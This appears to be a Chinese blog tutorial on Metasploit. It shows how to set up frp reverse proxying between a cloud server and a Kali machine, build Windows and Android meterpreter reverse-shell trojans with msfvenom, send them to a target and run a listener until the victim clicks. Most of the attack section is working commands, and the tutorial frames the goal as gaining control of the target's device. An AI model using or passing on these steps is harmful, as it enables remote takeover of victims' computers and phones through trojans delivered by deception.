metasploit学习——frp反向代理、内网穿透、木马
程序员文章站
2022-03-24 08:34:52
...
环境准备
①申请云服务器(获取公网IP)
②公网服务器与内网服务器同时下载frp进行安装解压后主要关注4个文件,分别是frpc
、frpc.ini
和frps
、frps.ini
,前者两个文件(frpc
、frpc.ini
)是客户端(client)所关注文件,后者两个文件(frps
、frps.ini
)是服务端(server)所关注两个文件环境配置(frp反向代理、内网穿透)
云主机:
#安装frp
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
#解压frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz
#进入frp解压目录
cd frp_0.16.1_linux_amd64
#查看frp_0.16.1_linux_amd64下的文件
ls
#编辑frps.ini文件
vi frps.ini
#frp服务端与客户端连接端口,frps和frpc必须一致;防火墙放行该端口,
bind_port=7000
#启动frps
./frps
kali配置:
#安装frp
wget https://github.com/fatedier/frp/releases/download/v0.16.1/frp_0.16.1_linux_amd64.tar.gz
#解压frp
tar -zxvf frp_0.16.1_linux_amd64.tar.gz
#进入frp解压目录
cd frp_0.16.1_linux_amd64
#查看frp_0.16.1_linux_amd64下的文件
ls
#编辑frpc.ini文件
vi frpc.ini
#修改内容:
[common]
server_addr = 你的云主机ip #公网IP
server_port = 7000 #frpc工作端口,和之前的云服务端的bind_port设置保持一致
[ssh]
type = tcp #连接协议
local_ip = 127.0.0.1 #内网服务器IP
local_port = 22 #ssh默认端口号
remote_port = 10086 #自定义端口号
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444 #msf默认监听端口为4444,转发给本机的4444端口,可自定义
remote_port = 2333 #服务端用该端口转发给本机,可自定义
木马程序制作
Windows:
#LHOST:必须设置为你的公网IP
#LPORT:设置之前在frpc.ini的remote_port=2333
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=2333 -f exe > /root/hacker.exe
Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你的公网ip LPORT=2333 R > /lol.apk
将制作好的木马发送给目标
发送完成后,kali中进行的步骤:
#进入msf
msfconsole
#进入监听模块
use exploit/multi/handler
#设置LHOST参数
set LHOST 127.0.0.1
#设置LPORT参数
set LPORT 4444
#开始攻击
exploit
等待目标点击木马,点击后会进入meterpreter>,则表示成功呢获得目标的控制权,即可进行进一步测试
问答:
Q:什么是反向代理
A:引用一个很容易理解的答案(原文:https://blog.csdn.net/xinpz/article/details/82732217)
Q:什么是内网穿透
A:实现不同局域网内的主机之间通过互联网进行通信
上一篇: 数据库基本概念面试必问